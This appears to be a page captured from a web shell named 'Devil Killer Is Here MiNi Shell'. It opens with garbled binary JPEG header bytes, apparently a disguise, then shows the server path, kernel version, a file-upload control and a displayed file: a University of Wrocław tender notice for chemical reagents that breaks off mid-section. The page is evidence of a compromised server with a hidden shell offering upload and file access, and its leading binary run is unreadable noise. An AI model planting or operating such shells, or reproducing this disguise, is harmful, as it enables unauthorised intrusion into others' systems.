JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240624/0038045201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa odczynników chemicznych do wysoko wyspecjalizowanych zastosowań badawczych na potrzeby jednostek Uniwersytetu Wrocławskiego - zadania” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">UNIWERSYTET WROCŁAWSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001301</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Uniwersytecki 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">50-137</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 71 375 20 04</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">anna.pawliszyn@uwr.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.uwr.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa odczynników chemicznych do wysoko wyspecjalizowanych zastosowań badawczych na potrzeby jednostek Uniwersytetu Wrocławskiego - zadania” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3159e37d-320e-11ef-8a31-0e435a8a43bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00380452</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00054153/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.40 Odczynniki do wysoko wyspecjalizowanych zastosowań badawczych na potrzeby jednostek Uniwersytetu Wrocławskiego.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/uniwersytet_wroclawski/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.1 W postępowaniu o udzielenie zamówienia komunikacja elektroniczna między<br/>Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej poprzez Platformę Przetargową (zwanej<br/>dalej „Platformą”) pod adresem: https://platformazakupowa.pl/pn/uniwersytet_wroclawski/proceedings, w wierszu oznaczonym tytułem oraz znakiem niniejszego postępowania.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wymagania techniczne i<br/>organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały w Instrukcjach dla użytkowników dostępnych pod adresem:<br/>https://platformazakupowa.pl/strona/1-regulamin<br/>2. Zamawiający, zgodnie z Roz. Prezesa Rady Ministrów z 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania<br/>informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie , określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na<br/>Platformie, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, b) komputer klasy PC lub MAC o<br/>następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych -<br/>MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, c) zainstalowana dowolna, inna przeglądarka internetowa niż Internet<br/>Explorer, d)włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>3. Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>4. Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>5. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z Platformy określone w Regulaminie zamieszczonym na stronie internetowej Platformy w zakładce<br/>„Regulamin&#34; oraz uznaje go za wiążący,<br/>b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej na Platformie<br/>6. Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania<br/>oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.<br/>7. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z Platformy, w<br/>szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty<br/>w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie<br/>będzie brana pod uwagę w przedmiotowym postępowaniu, ponieważ nie został spełniony obowiązek narzucony w art. 221 Ustawy<br/>Prawo Zamówień Publicznych.<br/>8. Zamawiający informuje, że instrukcje korzystania z Platformy dotyczące w szczególności logowania, składania wniosków o<br/>wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy<br/>znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-<br/>instrukcje<br/>9. Wsparcia technicznego udziela jej dostawca: Centrum Wsparcia Klienta Platformy: platformazakupowa.pl; tel. 22 101 02 02;<br/>email: cwk@platformazakupowa.pl<br/>10. Oferta, oświadczenie, o którym mowa w art. 125 ust. 1 uPzp, podmiotowe środki dowodowe, w tym oświadczenie, o którym<br/>mowa w art. 117 ust. 4 uPzp, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 uPzp,<br/>przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się w postaci elektronicznej w języku polskim, w ogólnodostępnych<br/>formatach danych, w szczególności .pdf, .doc, .xls’, .docx, .rtf, .xps, .odt, .txt oraz składa pod rygorem nieważności, w formie<br/>elektronicznej (z kwalifikowanym podpisem) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1-2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO” oraz art. 19 uPzp, Zamawiający – Uniwersytet Wrocławski - informuje, że:<br/>• administratorem Pani/Pana danych osobowych jest Uniwersytet Wrocławski, pl. Uniwersytecki 1, 50-137 Wrocław, reprezentowany<br/>przez Rektora;<br/>• o celach i sposobach przetwarzania danych osobowych podawanych w związku z realizacją procedur udzielania zamówień</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">publicznych decyduje Uniwersytet jako Administrator danych;<br/>• Administrator wyznaczył osobę pełniącą zadania Inspektora Ochrony Danych Osobowych i można kontaktować się poprzez adres<br/>email: iod@uwr.edu.pl;<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu wyłonienia wykonawcy w<br/>przedmiotowym postępowaniu o zamówienie publiczne przeprowadzane zgodnie z uPzp oraz w pozostałych celach określonych w<br/>uPzp;<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 uPzp; ponadto dane osobowe mogą zostać przekazane na zasadach wynikających z ustawy z dnia 6<br/>września 2001 r. o dostępie do informacji publicznej;<br/>• okres przechowywania Pani/Pana danych osobowych wynosi odpowiednio:<br/>- zgodnie z art. 78 ust. 1 uPzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia,<br/>- jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>- w przypadku zamówień współfinansowanych ze środków UE przez okres, o którym mowa w art. 125 ust 4 lit d) w zw z art. 140<br/>Rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 1303/2013 i wynikających z umów o dofinansowanie projektów<br/>finansowanych ze środków pochodzących z UE;<br/>- okres przechowywania wynika również z ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach<br/>• obowiązek podania przez Panią/Pana danych osobowych jest wymogiem ustawowym wynikającym z uPzp, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego i jest warunkiem zawarcia umowy o zamówienie publiczne; konsekwencją<br/>nieudostępnienia do przetwarzania danych osobowych będzie odrzucenie złożonej oferty<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;<br/>• Pani/Pana dane osobowe będą przekazywane do państwa trzeciego (poza UE) /organizacji międzynarodowej na zasadach<br/>określonych w uPzp. Może Pan/ Pani uzyskać kopię danych osobowych przekazywanych do państwa trzeciego na zasadach<br/>wynikających z uPzp;<br/>• posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>- w przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO wymagałoby niewspółmiernie dużego wysiłku,<br/>Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie<br/>żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego;<br/>- wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do zakończenia<br/>postępowania o udzielenie zamówienia publicznego;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.2710.21.2024.AP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 737298,64 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 657095,34 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Rodzaj zamówienia: dostawa.<br/>2.	Przedmiotem zamówienia jest sukcesywna dostawa odczynników chemicznych do wysoko wyspecjalizowanych zastosowań badawczych na potrzeby jednostek Uniwersytetu Wrocławskiego z podziałem na następujące Zadania:<br/>Zadanie nr 1: Ilość pozycji: 1-21<br/>1)	których szczegółowy opis znajduje się w Załączniku nr 3 do SWZ – Arkusz kalkulacyjny - Opis przedmiotu zamówienia (OPZ) dla Zadania nr 1; Wszystkie odczynniki opisane w przedmiotowym Arkuszu Kalkulacyjnym powinny być dostarczone w butelkach, <br/>2)	innych odczynników niż opisane w Arkuszu Kalkulacyjnym - OPZ dla Zadania nr 1, należących do grupy odczynników chemicznych do wysoko wyspecjalizowanych zastosowań badawczych – zgodnie z bieżącym zapotrzebowaniem Zamawiającego, do kwoty określonej w Załączniku nr 3. <br/>3.	Szczegółowy zakres obowiązków wykonania przedmiotu zamówienia znajduje się we wzorze umowy (który stanowi projektowane postanowienia umowy w rozumieniu art. 281 ust. 1 pkt 7 uPzp), stanowiącym Załącznik nr 4 do SWZ.<br/>4.	Realizacja zamówienia ma odbywać się z należytą starannością i zgodnie ze wszystkimi wymogami zawartymi w SWZ z załącznikami i ewentualnymi Informacjami dla Wykonawców.<br/>Wykonawca na etapie realizacji zamówienia, wykonuje przedmiot zamówienia zgodnie <br/>z wymogami Zamawiającego. <br/>5.	Oferta na dane Zadanie musi być jednoznaczna i kompleksowa tj. obejmować cały asortyment przedmiotu zamówienia w danym Zadaniu. Wykonawca zobowiązany jest do złożenia oferty, której treść pozwoli Zamawiającemu na zweryfikowanie oferty pod względem jej zgodności z treścią SWZ. Treść oferty Wykonawcy musi odpowiadać treści specyfikacji warunków zamówienia. Tym samym Wykonawca zobowiązany jest do wypełnienia Arkusza kalkulacyjnego - Opisu przedmiotu zamówienia – stanowiącego Załącznik nr 3 do SWZ odpowiednio dla danego Zadania, poprzez dokładne określenie numeru katalogowego producenta i nazwy producenta oferowanego odczynnika oraz wskazanie ceny zgodnie z wymaganiami. Podane ilości w Arkuszu Kalkulacyjnym są poglądowe i służą do podania ceny jednostkowej przez Wykonawcę niezbędnej do rozliczenia umowy, a także do wyliczenia ceny ofertowej w Formularzu Ofertowym dla danego Zadania. <br/>6.Przedmiot zamówienia musi być fabrycznie nowy, nieużywany, nieuszkodzony, niepowystawowy, wolny od wad fizycznych i prawnych, nie może być przedmiotem praw osób trzecich, a także ma pochodzić z bieżącej produkcji.<br/>7.Przedmiot zamówienia musi spełniać wszystkie obowiązujące normy prawne bezpieczeństwa przepisów polskich i Unii Europejskiej, posiadać wszelkie wymagane prawem dopuszczenia i atesty oraz oznakowania zgodnie z obowiązującymi przepisami oraz ma zostać dostarczony w opakowaniu zabezpieczającym.<br/>8.Miejsce dostawy: Jednostki/komórki organizacyjne Uniwersytetu Wrocławskiego znajdujące się na terenie miasta Wrocław. Zamawiający w składanym zamówieniu, o którym mowa w § 3 ust. 6 projektowanych postanowień umowy wskazuje adres miejsca dostawy. <br/>9.Gwarancja i rękojmia:<br/>Szczegóły dotyczące gwarancji i rękojmi zostały określone w projektowanych postanowieniach umowy, które stanowią załącznik nr 4 do SWZ.<br/>10. Termin realizacji umowy: dostawy następować będą partiami, sukcesywnie i stosownie do potrzeb Zamawiającego, na zasadach określonych w umowie, przez okres 12 miesięcy od dnia zawarcia umowy („Pierwotny termin obowiązywania umowy”) lub do wyczerpania kwoty całkowitego maksymalnego wynagrodzenia, o której mowa w § 2 ust. 1 umowy, jeżeli nastąpi to przed upływem terminu, na jaki umowa została zawarta. W przypadku niewyczerpania całkowitej wartości umowy brutto (wartości zamówienia dodatkowego, zamówienia podstawowego, zamówienia opcjonalnego) w Pierwotnym terminie obowiązywania umowy, termin ten może ulec wydłużeniu maksymalnie do 12 miesięcy na podstawie § 10 ust. 1 pkt 1.2 umowy. <br/>11. Termin realizacji poszczególnych zamówień podstawowych i opcjonalnych dla Zadania nr 1 , nie może być dłuższy niż: do 14 dni kalendarzowych od dnia złożenia zamówienia przez Zamawiającego do Wykonawcy. <br/>12.	Termin realizacji poszczególnych zamówień dodatkowych w ramach Zadania nr 1 będzie uzgadniany indywidualnie. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 438018,09 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696300-8 - Odczynniki chemiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> PRAWO OPCJI DLA ZADANIA 1 -<br/>MAKSYMALNA WARTOŚĆ OPCJI: 141296,16 zł netto, tj. 173794,27 zł brutto<br/>1) Zamawiającemu przysługuje prawo opcji polegające na zwiększeniu ilości zamawianego asortymentu do 50 % wartości<br/>wynagrodzenia podstawowego brutto, o którym mowa w § 2 ust. 2 pkt 2.1 umowy, w zależności od potrzeb i posiadanych<br/>środków finansowych przez Zamawiającego. Zamawiający będzie mógł skorzystać z prawa opcji po wyczerpaniu wartości<br/>umowy za wykonanie zamówienia podstawowego, o którym mowa w § 2 pkt 2.1 umowy. Skorzystanie przez Zamawiającego<br/>z prawa opcji jest możliwe zarówno w okresie trwania umowy wskazanym w § 3 ust. 1 zdanie pierwsze („Pierwotny termin<br/>obowiązywania umowy”), jak również po jej przedłużeniu na podstawie § 10 ust. 1 pkt. 1.2 umowy.<br/>2) Wynagrodzenie opcjonalne Wykonawcy zależeć będzie od ilości faktycznie zakupionego przedmiotu zamówienia,<br/>zgodnie z przyjętym sposobem realizacji przedmiotu zamówienia w ramach prawa opcji.<br/>3) Jako podstawę rozliczania realizacji przedmiotu zamówienia w ramach prawa opcji przyjmuje się ceny jednostkowe<br/>poszczególnego asortymentu podane przez Wykonawcę w Ofercie – Arkusz kalkulacyjny (Załącznik nr 3 do SWZ), które<br/>obowiązują przez cały okres wykonywania umowy i nie mogą wzrosnąć w okresie jej wykonywania z zastrzeżeniem § 10 ust. 7 i 16 Umowy.<br/><br/>ZAMÓWIENIE ODCZYNNIKÓW DODATKOWYCH DLA ZADANIA 1<br/>Maksymalna wartość zamówienia dodatkowego:<br/>14 129,62 zł netto, tj. 17 379,43 zł brutto:<br/>1) Zamawiającemu przysługuje prawo do zakupu odczynników dodatkowych opisanych w § 1 ust. 2 umowy, do kwoty wartości wynagrodzenia dodatkowego brutto, o którym mowa w § 2 ust. 2 pkt 2.3 umowy (tj. kwoty wskazanej w Tabeli zatytułowanej Podsumowanie w poz. F „Arkusza Kalkulacyjnego), w zależności od potrzeb i posiadanych środków<br/>finansowych przez Zamawiającego. Skorzystanie przez Zamawiającego z zamówień dodatkowych jest możliwe zarówno w<br/>okresie trwania umowy wskazanym w § 3 ust. 1 zdanie pierwsze umowy („Pierwotny termin obowiązywania umowy”), jak<br/>również po jej przedłużeniu na podstawie § 10 ust. 1 pkt. 1.2 umowy.<br/>2) Wynagrodzenie dodatkowe Wykonawcy zależeć będzie od ilości faktycznie zakupionych odczynników, opisanych w § 1<br/>ust. 2 umowy, zgodnie z przyjętym sposobem realizacji przedmiotu zamówienia w ramach zamówień dodatkowych.<br/>3) Jako podstawę rozliczania realizacji przedmiotu zamówienia w ramach zamówień dodatkowych przyjmuje się ceny<br/>jednostkowe poszczególnego asortymentu wskazane w zamówieniu dodatkowym, sporządzonym przez Zamawiającego, na<br/>podstawie cen podanych przez Wykonawcę w odpowiedzi na zapytanie o dany odczynnik – zgodnie z trybem właściwym dla<br/>zamówień dodatkowych opisanym w § 3 ust. 10 -12 umowy.<br/><br/>SZCZEGÓŁÓWE UREGULOWANIA DOT. PRAWA OPCJI ORAZ ZAMÓWIEŃ DODATKOWYCH znajdują się we wzorze<br/>umowy stanowiącym zał. nr 4 do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>Kryterium 1: Cena (C)– 